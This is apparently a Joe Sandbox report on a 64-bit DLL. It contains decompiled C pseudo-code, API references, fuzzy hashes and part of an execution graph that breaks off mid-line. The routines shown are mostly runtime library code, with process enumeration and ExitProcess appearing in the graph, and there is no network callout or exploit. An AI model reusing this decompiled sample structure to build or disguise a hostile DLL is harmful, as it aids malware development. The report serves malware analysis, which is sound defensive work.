                                                                                                        Similarity
                                                                                                        • API ID: ConsoleErrorLastMode
                                                                                                        • String ID:
                                                                                                        • API String ID: 953036326-0
                                                                                                        • Opcode ID: da2f82535048981fdee2fbb5626fefef0911d61da315dbd697428ec573955214
                                                                                                        • Instruction ID: 62e5c960dc099423a216b0f06247754d27a116cfc4d52241169096ab12f5f29f
                                                                                                        • Opcode Fuzzy Hash: da2f82535048981fdee2fbb5626fefef0911d61da315dbd697428ec573955214
                                                                                                        • Instruction Fuzzy Hash: 6391D662E1C67A95FB50EB699C802BD27A0FB04B99F442137DE0E57AD4DF38D441CB28
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 47%
                                                                                                        			E00007FFC7FFC28901CE0(void* __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
                                                                                                        				long long _v16;
                                                                                                        				long long _v24;
                                                                                                        				intOrPtr* _t48;
                                                                                                        				intOrPtr* _t50;
                                                                                                        				intOrPtr* _t52;
                                                                                                        				intOrPtr _t62;
                                                                                                        
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				if ((E00007FFC7FFC28902250(__rax, _a8, _a16) & 0x000000ff) == 0) goto 0x28901d3a;
                                                                                                        				E00007FFC7FFC289018F0(__rax, _a8);
                                                                                                        				_t48 = _a16 - __rax;
                                                                                                        				E00007FFC7FFC28901DF0(_t48, _a8, _a8, _t48, _a24);
                                                                                                        				goto 0x28901de7;
                                                                                                        				E00007FFC7FFC28902170(_t48, _a8);
                                                                                                        				_t62 =  *0x2897a228; // 0xffffffffffffffff
                                                                                                        				_t50 = _t62 -  *_t48;
                                                                                                        				if (_t50 - _a24 > 0) goto 0x28901d65;
                                                                                                        				E00007FFC7FFC28902230(_a8);
                                                                                                        				E00007FFC7FFC28902170(_t50, _a8);
                                                                                                        				_t52 =  *_t50 + _a24;
                                                                                                        				_v24 = _t52;
                                                                                                        				if (_a24 <= 0) goto 0x28901de2;
                                                                                                        				r8d = 0;
                                                                                                        				if ((E00007FFC7FFC289022B0(_t52, _a8, _v24) & 0x000000ff) == 0) goto 0x28901de2;
                                                                                                        				E00007FFC7FFC289018F0(_t52, _a8);
                                                                                                        				_v16 = _t52;
                                                                                                        				E00007FFC7FFC28902170(_t52, _a8);
                                                                                                        				E00007FFC7FFC289011E0(_v16 +  *_t52, _a16, _a24);
                                                                                                        				return E00007FFC7FFC289023A0(_v16 +  *_t52, _a8, _v24);
                                                                                                        			}









                                                                                                        0x7ffc28901ce0
                                                                                                        0x7ffc28901ce5
                                                                                                        0x7ffc28901cea
                                                                                                        0x7ffc28901d07
                                                                                                        0x7ffc28901d0e
                                                                                                        0x7ffc28901d1b
                                                                                                        0x7ffc28901d30
                                                                                                        0x7ffc28901d35
                                                                                                        0x7ffc28901d3f
                                                                                                        0x7ffc28901d47
                                                                                                        0x7ffc28901d51
                                                                                                        0x7ffc28901d59
                                                                                                        0x7ffc28901d60
                                                                                                        0x7ffc28901d6a
                                                                                                        0x7ffc28901d72
                                                                                                        0x7ffc28901d77
                                                                                                        0x7ffc28901d82
                                                                                                        0x7ffc28901d84
                                                                                                        0x7ffc28901d9b
                                                                                                        0x7ffc28901da2
                                                                                                        0x7ffc28901da7
                                                                                                        0x7ffc28901db1
                                                                                                        0x7ffc28901dce
                                                                                                        0x7ffc28901deb

                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FFC28902250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC2890226B
                                                                                                          • Part of subcall function 00007FFC28902250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC2890227C
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC28901D0E
                                                                                                          • Part of subcall function 00007FFC289018F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC289018FE
                                                                                                          • Part of subcall function 00007FFC28901DF0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFC28901E56
                                                                                                          • Part of subcall function 00007FFC28901DF0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC28901E98
                                                                                                          • Part of subcall function 00007FFC28901DF0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC28901EAC
                                                                                                          • Part of subcall function 00007FFC28901DF0: char_traits.LIBCPMTD ref: 00007FFC28901EDB
                                                                                                        • _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFC28901D60
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC28901DA2
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC28901DCE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::Work$Base::ContextIdentityQueue$Mtx_guardMtx_guard::~_char_traits$EmptyQueue::Structured
                                                                                                        • String ID:
                                                                                                        • API String ID: 3922470843-0
                                                                                                        • Opcode ID: 9dc5e077f87c3be6b44e717f9175d65acc51dec95d13604ab53f14413601f7af
                                                                                                        • Instruction ID: cf35d693f048c0a8354b8a5596612a608d539443793cd0511670a649644b0732
                                                                                                        • Opcode Fuzzy Hash: 9dc5e077f87c3be6b44e717f9175d65acc51dec95d13604ab53f14413601f7af
                                                                                                        • Instruction Fuzzy Hash: 9A21B022618A9981DA50EB96EC5127EA370FBC5BC1F500037FB8D47BAACE6ED540CB54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 50%
                                                                                                        			E00007FFC7FFC28901DF0(intOrPtr* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
                                                                                                        				long long _v24;
                                                                                                        				long long _v32;
                                                                                                        				long long _v40;
                                                                                                        				void* _t44;
                                                                                                        				intOrPtr* _t49;
                                                                                                        				intOrPtr* _t51;
                                                                                                        				long long _t53;
                                                                                                        				intOrPtr* _t54;
                                                                                                        				intOrPtr _t61;
                                                                                                        
                                                                                                        				_t49 = __rax;
                                                                                                        				_a32 = __r9;
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				E00007FFC7FFC289021F0(_t44, __rax, _a16, _a24);
                                                                                                        				E00007FFC7FFC28902400(_t44, __rax, _a16, _a24, _a32);
                                                                                                        				_a32 = _t49;
                                                                                                        				E00007FFC7FFC28902170(_t49, _a8);
                                                                                                        				_t61 =  *0x2897a228; // 0xffffffffffffffff
                                                                                                        				_t51 = _t61 -  *_t49;
                                                                                                        				if (_t51 - _a32 > 0) goto 0x28901e5b;
                                                                                                        				E00007FFC7FFC28902230(_a8);
                                                                                                        				E00007FFC7FFC28902170(_t51, _a8);
                                                                                                        				_t53 =  *_t51 + _a32;
                                                                                                        				_v40 = _t53;
                                                                                                        				if (_a32 <= 0) goto 0x28901eef;
                                                                                                        				r8d = 0;
                                                                                                        				if ((E00007FFC7FFC289022B0(_t53, _a8, _v40) & 0x000000ff) == 0) goto 0x28901eef;
                                                                                                        				E00007FFC7FFC289018D0(_t53, _a16);
                                                                                                        				_t54 = _t53 + _a24;
                                                                                                        				_v24 = _t54;
                                                                                                        				E00007FFC7FFC289018F0(_t54, _a8);
                                                                                                        				_v32 = _t54;
                                                                                                        				E00007FFC7FFC28902170(_t54, _a8);
                                                                                                        				E00007FFC7FFC289011E0(_v32 +  *_t54, _v24, _a32);
                                                                                                        				return E00007FFC7FFC289023A0(_v32 +  *_t54, _a8, _v40);
                                                                                                        			}












                                                                                                        0x7ffc28901df0
                                                                                                        0x7ffc28901df0
                                                                                                        0x7ffc28901df5
                                                                                                        0x7ffc28901dfa
                                                                                                        0x7ffc28901dff
                                                                                                        0x7ffc28901e12
                                                                                                        0x7ffc28901e26
                                                                                                        0x7ffc28901e2b
                                                                                                        0x7ffc28901e35
                                                                                                        0x7ffc28901e3d
                                                                                                        0x7ffc28901e47
                                                                                                        0x7ffc28901e4f
                                                                                                        0x7ffc28901e56
                                                                                                        0x7ffc28901e60
                                                                                                        0x7ffc28901e68
                                                                                                        0x7ffc28901e6d
                                                                                                        0x7ffc28901e78
                                                                                                        0x7ffc28901e7a
                                                                                                        0x7ffc28901e91
                                                                                                        0x7ffc28901e98
                                                                                                        0x7ffc28901e9d
                                                                                                        0x7ffc28901ea2
                                                                                                        0x7ffc28901eac
                                                                                                        0x7ffc28901eb1
                                                                                                        0x7ffc28901ebb
                                                                                                        0x7ffc28901edb
                                                                                                        0x7ffc28901ef8

                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FFC289021F0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFC28902217
                                                                                                          • Part of subcall function 00007FFC28902170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC2890217E
                                                                                                        • _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFC28901E56
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC28901E98
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC28901EAC
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC28901EDB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::Work$Base::ContextIdentityMtx_guardMtx_guard::~_Queue$EmptyQueue::Structuredchar_traits
                                                                                                        • String ID:
                                                                                                        • API String ID: 3679362534-0
                                                                                                        • Opcode ID: be7b329d797fb93d546e8614ca837f2ae52d3ad5271fd09d0c871be752f4c66c
                                                                                                        • Instruction ID: 9802d9fba11ec55252df7317a82468f8a1a36f4d1a398af0de3fa21fd6a7612f
                                                                                                        • Opcode Fuzzy Hash: be7b329d797fb93d546e8614ca837f2ae52d3ad5271fd09d0c871be752f4c66c
                                                                                                        • Instruction Fuzzy Hash: 3F21FE32618B5981DA50EB96FC9122FA360FBC8BD1F000036FA8D47BAACE7DD550CB54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 56%
                                                                                                        			E00007FFC7FFC28911004(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
                                                                                                        				intOrPtr _v0;
                                                                                                        				signed long long _v8;
                                                                                                        				void* __rdi;
                                                                                                        				void* __rsi;
                                                                                                        				signed int _t41;
                                                                                                        				signed long long _t62;
                                                                                                        				short* _t67;
                                                                                                        				signed int* _t68;
                                                                                                        				intOrPtr* _t74;
                                                                                                        				intOrPtr* _t76;
                                                                                                        				void* _t84;
                                                                                                        				void* _t88;
                                                                                                        				signed short* _t89;
                                                                                                        				void* _t91;
                                                                                                        				void* _t94;
                                                                                                        				signed short* _t97;
                                                                                                        				void* _t99;
                                                                                                        				void* _t101;
                                                                                                        				void* _t103;
                                                                                                        				void* _t106;
                                                                                                        				void* _t107;
                                                                                                        
                                                                                                        				_t97 = __r8;
                                                                                                        				_t76 = __rcx;
                                                                                                        				_a8 = __rbx;
                                                                                                        				_a24 = __rbp;
                                                                                                        				E00007FFC7FFC28912DE0(__edx, __rax, __rbx, __rcx, _t84, _t88, _t91, __r8, _t99, _t101, _t103);
                                                                                                        				_t62 =  *0x2897e008; // 0xae6141e854aa
                                                                                                        				_a5176 = _t62 ^ _t94 - __rax;
                                                                                                        				_t74 = _t76;
                                                                                                        				r14d = r9d;
                                                                                                        				r10d = r10d & 0x0000003f;
                                                                                                        				_t107 = _t106 + _t97;
                                                                                                        				_t89 = _t97;
                                                                                                        				 *_t74 =  *((intOrPtr*)(0x2897f940 + (__edx >> 6) * 8));
                                                                                                        				 *((intOrPtr*)(_t74 + 8)) = 0;
                                                                                                        				if (_t97 - _t107 >= 0) goto 0x28911145;
                                                                                                        				_t67 =  &_a40;
                                                                                                        				if (_t89 - _t107 >= 0) goto 0x289110ae;
                                                                                                        				_t41 =  *_t89 & 0x0000ffff;
                                                                                                        				if (_t41 != 0xa) goto 0x2891109a;
                                                                                                        				 *_t67 = 0xd;
                                                                                                        				_t68 = _t67 + 2;
                                                                                                        				 *_t68 = _t41;
                                                                                                        				if ( &(_t68[0]) -  &_a1744 < 0) goto 0x2891107c;
                                                                                                        				_a16 = _a16 & 0x00000000;
                                                                                                        				_a8 = _a8 & 0x00000000;
                                                                                                        				_v0 = 0xd55;
                                                                                                        				_v8 =  &_a1752;
                                                                                                        				r9d = 0;
                                                                                                        				E00007FFC7FFC2890D698();
                                                                                                        				if (0 == 0) goto 0x2891113d;
                                                                                                        				if (0 == 0) goto 0x2891112d;
                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                        				r8d = 0;
                                                                                                        				r8d = r8d;
                                                                                                        				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x2891113d;
                                                                                                        				if (0 + _a24 < 0) goto 0x289110fa;
                                                                                                        				 *((intOrPtr*)(_t74 + 4)) = __edi - r15d;
                                                                                                        				goto 0x28911071;
                                                                                                        				 *_t74 = GetLastError();
                                                                                                        				return E00007FFC7FFC28903A70(_t39, 0, 0, _a5176 ^ _t94 - __rax);
                                                                                                        			}
























                                                                                                        0x7ffc28911004
                                                                                                        0x7ffc28911004
                                                                                                        0x7ffc28911004
                                                                                                        0x7ffc28911009
                                                                                                        0x7ffc2891101b
                                                                                                        0x7ffc28911023
                                                                                                        0x7ffc2891102d
                                                                                                        0x7ffc28911038
                                                                                                        0x7ffc2891103e
                                                                                                        0x7ffc2891104c
                                                                                                        0x7ffc28911050
                                                                                                        0x7ffc28911056
                                                                                                        0x7ffc28911068
                                                                                                        0x7ffc2891106e
                                                                                                        0x7ffc28911071
                                                                                                        0x7ffc28911077
                                                                                                        0x7ffc2891107f
                                                                                                        0x7ffc28911081
                                                                                                        0x7ffc2891108c
                                                                                                        0x7ffc28911093
                                                                                                        0x7ffc28911096
                                                                                                        0x7ffc2891109a
                                                                                                        0x7ffc289110ac
                                                                                                        0x7ffc289110ae
                                                                                                        0x7ffc289110b9
                                                                                                        0x7ffc289110c7
                                                                                                        0x7ffc289110da
                                                                                                        0x7ffc289110df
                                                                                                        0x7ffc289110e9
                                                                                                        0x7ffc289110f2
                                                                                                        0x7ffc289110f8
                                                                                                        0x7ffc289110fa
                                                                                                        0x7ffc2891110f
                                                                                                        0x7ffc28911118
                                                                                                        0x7ffc28911123
                                                                                                        0x7ffc2891112b
                                                                                                        0x7ffc28911132
                                                                                                        0x7ffc28911138
                                                                                                        0x7ffc28911143
                                                                                                        0x7ffc28911173

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                        • String ID: U
                                                                                                        • API String ID: 442123175-4171548499
                                                                                                        • Opcode ID: f98079f3c4aa1eb608d226a3e204fe1cd29820aa8a2509467dcded0e9b762ee9
                                                                                                        • Instruction ID: 7fcdf1ce994ecf9cb7b025163590bb9f00ca1bd16f9e5f33f97bc3d43bb5e617
                                                                                                        • Opcode Fuzzy Hash: f98079f3c4aa1eb608d226a3e204fe1cd29820aa8a2509467dcded0e9b762ee9
                                                                                                        • Instruction Fuzzy Hash: 9341C762B1CA9591DB10DF29EC443A9B7A0F788B95F844032EE4E87798DF3CD441CB54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00007FFC7FFC28912EB4(intOrPtr* __rcx) {
                                                                                                        				void* __rbx;
                                                                                                        				void* _t3;
                                                                                                        				void* _t7;
                                                                                                        				void* _t10;
                                                                                                        				void* _t11;
                                                                                                        				void* _t12;
                                                                                                        				void* _t13;
                                                                                                        
                                                                                                        				_t3 = E00007FFC7FFC28906B4C(_t7, __rcx, __rcx, _t10, _t11, _t12, _t13);
                                                                                                        				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x28912ed5;
                                                                                                        				if ( *__rcx != 0xe06d7363) goto 0x28912ed5;
                                                                                                        				if (_t3 == 1) goto 0x28912edb;
                                                                                                        				return _t3;
                                                                                                        			}










                                                                                                        0x7ffc28912ebd
                                                                                                        0x7ffc28912ec6
                                                                                                        0x7ffc28912ece
                                                                                                        0x7ffc28912ed3
                                                                                                        0x7ffc28912eda

                                                                                                        APIs
                                                                                                        • __C_specific_handler.LIBVCRUNTIME ref: 00007FFC28912EBD
                                                                                                          • Part of subcall function 00007FFC28906B4C: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FFC28906C0C
                                                                                                          • Part of subcall function 00007FFC28906B4C: RtlUnwindEx.KERNEL32 ref: 00007FFC28906C5B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: C_specific_handlerCurrentImageNonwritableUnwind
                                                                                                        • String ID: csm$f
                                                                                                        • API String ID: 1396615161-629598281
                                                                                                        • Opcode ID: 8a5be923c7cc1b99aa4a0096ba3a69dd8979e15323e2be363a2fe093e1ce8b04
                                                                                                        • Instruction ID: d1e023d64a95aa4ad2fa2a3b871c3754704b9a91054573e5dddd5b5498581184
                                                                                                        • Opcode Fuzzy Hash: 8a5be923c7cc1b99aa4a0096ba3a69dd8979e15323e2be363a2fe093e1ce8b04
                                                                                                        • Instruction Fuzzy Hash: A8D05E51D0C36E45FB3A75B51C452781690CF1C726F088432C92C442C76F1E98E0CA29
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClassCursorLoadRegister
                                                                                                        • String ID: P
                                                                                                        • API String ID: 1693014935-3110715001
                                                                                                        • Opcode ID: 29bdbaf3f29e2b1f60e2da6c671781d039cfe66c367808efb662ff8ab2e4e8d5
                                                                                                        • Instruction ID: 5a0070af3d2ea1f4d5bd1102f695a7b50df8b3b7f5d4498cef1e5a466211db3c
                                                                                                        • Opcode Fuzzy Hash: 29bdbaf3f29e2b1f60e2da6c671781d039cfe66c367808efb662ff8ab2e4e8d5
                                                                                                        • Instruction Fuzzy Hash: 1301C432519B8586E7609F00F89835BB7B4F788749F600129E6CD42BA8DFBDD158CF44
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 37%
                                                                                                        			E00007FFC7FFC2890472C(void* __eflags, void* __rax) {
                                                                                                        				char _v40;
                                                                                                        				void* _t6;
                                                                                                        				void* _t11;
                                                                                                        				void* _t12;
                                                                                                        				char* _t14;
                                                                                                        				void* _t16;
                                                                                                        
                                                                                                        				E00007FFC7FFC289045C0(__rax,  &_v40);
                                                                                                        				_t14 =  &_v40;
                                                                                                        				_t6 = E00007FFC7FFC28906E00(_t12, _t14, 0x2897cbd8, _t16);
                                                                                                        				asm("int3");
                                                                                                        				_t11 =  !=  ?  *((void*)(_t14 + 8)) : "Unknown exception";
                                                                                                        				return _t6;
                                                                                                        			}









                                                                                                        0x7ffc28904735
                                                                                                        0x7ffc28904741
                                                                                                        0x7ffc28904746
                                                                                                        0x7ffc2890474b
                                                                                                        0x7ffc28904758
                                                                                                        0x7ffc2890475d

                                                                                                        APIs
                                                                                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFC28904735
                                                                                                        • _CxxThrowException.LIBVCRUNTIME ref: 00007FFC28904746
                                                                                                          • Part of subcall function 00007FFC28906E00: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFC2890472B), ref: 00007FFC28906E7D
                                                                                                          • Part of subcall function 00007FFC28906E00: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFC2890472B), ref: 00007FFC28906EBC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                                                        • String ID: Unknown exception
                                                                                                        • API String ID: 3561508498-410509341
                                                                                                        • Opcode ID: 245809459ad59a2729b59716ed244728fe2af4985c2eaed7b011566377c0e5b0
                                                                                                        • Instruction ID: cbe5c85a7fa2b5f3eb5d8e1316020417eadb8500b127de4668a9cafd6cde86fb
                                                                                                        • Opcode Fuzzy Hash: 245809459ad59a2729b59716ed244728fe2af4985c2eaed7b011566377c0e5b0
                                                                                                        • Instruction Fuzzy Hash: 61D05E22A18A9AD5FE10FB00EC843A86330FB8030EF904433E24C415F1DF2DD64AC364
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:10%
                                                                                                        Dynamic/Decrypted Code Coverage:2.3%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:900
                                                                                                        Total number of Limit Nodes:7
                                                                                                        execution_graph 18355 18000be34 18358 180005db4 18355->18358 18357 18000bf4c 18359 180005df9 18358->18359 18360 1800060dd Process32FirstW 18359->18360 18361 180005e61 18359->18361 18360->18359 18361->18357 18362 7ffc28913f70 18365 7ffc28919600 18362->18365 18364 7ffc28913f97 ExitProcess 18366 7ffc28919758 18365->18366 18366->18364 17123 7ffc28904394 17124 7ffc289043ba 17123->17124 17125 7ffc289043f1 17124->17125 17126 7ffc289043d1 dllmain_raw 17124->17126 17128 7ffc289043c2 17124->17128 17125->17128 17172 7ffc28913fb0 17125->17172 17127 7ffc289043e4 17126->17127 17126->17128 17140 7ffc28904194 17127->17140 17132 7ffc2890443e 17132->17128 17134 7ffc28904194 84 API calls 17132->17134 17133 7ffc28913fb0 75 API calls 17135 7ffc28904424 17133->17135 17136 7ffc28904454 17134->17136 17137 7ffc28904194 84 API calls 17135->17137 17136->17128 17138 7ffc2890445e dllmain_raw 17136->17138 17139 7ffc28904431 dllmain_raw 17137->17139 17138->17128 17139->17132 17141 7ffc2890419c 17140->17141 17152 7ffc289041d5 __scrt_acquire_startup_lock 17140->17152 17142 7ffc289041a1 17141->17142 17146 7ffc289041c9 17141->17146 17143 7ffc289041a6 17142->17143 17144 7ffc289041bc __scrt_dllmain_crt_thread_attach 17142->17144 17148 7ffc289041ab 17143->17148 17221 7ffc28903e58 17143->17221 17149 7ffc289041ba 17144->17149 17145 7ffc2890432e 17145->17125 17206 7ffc28903f18 17146->17206 17148->17125 17149->17125 17151 7ffc28904359 17233 7ffc28903ed4 17151->17233 17152->17145 17152->17151 17153 7ffc28904944 __scrt_fastfail 7 API calls 17152->17153 17153->17151 17155 7ffc2890435e 17238 7ffc28903f04 17155->17238 17156 7ffc28904206 __scrt_acquire_startup_lock 17158 7ffc28904232 17156->17158 17168 7ffc2890420a __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 17156->17168 17226 7ffc28904944 IsProcessorFeaturePresent 17156->17226 17214 7ffc28903e18 17158->17214 17159 7ffc28904369 __scrt_release_startup_lock 17242 7ffc289040f0 17159->17242 17163 7ffc28904241 _RTC_Initialize 17163->17168 17217 7ffc2890416c 17163->17217 17167 7ffc2890425b 17169 7ffc2890416c shared_ptr 50 API calls 17167->17169 17168->17125 17170 7ffc28904267 __scrt_initialize_default_local_stdio_options 17169->17170 17170->17168 17171 7ffc28904283 __scrt_dllmain_after_initialize_c 17170->17171 17171->17168 17173 7ffc28913fe9 17172->17173 17176 7ffc28913fee __scrt_fastfail __std_exception_destroy new 17172->17176 17644 7ffc28903a70 17173->17644 17489 7ffc28919970 17176->17489 17178 7ffc289191fd 17179 7ffc28919970 49 API calls 17178->17179 17180 7ffc28919217 std::_Container_base12::~_Container_base12 17179->17180 17612 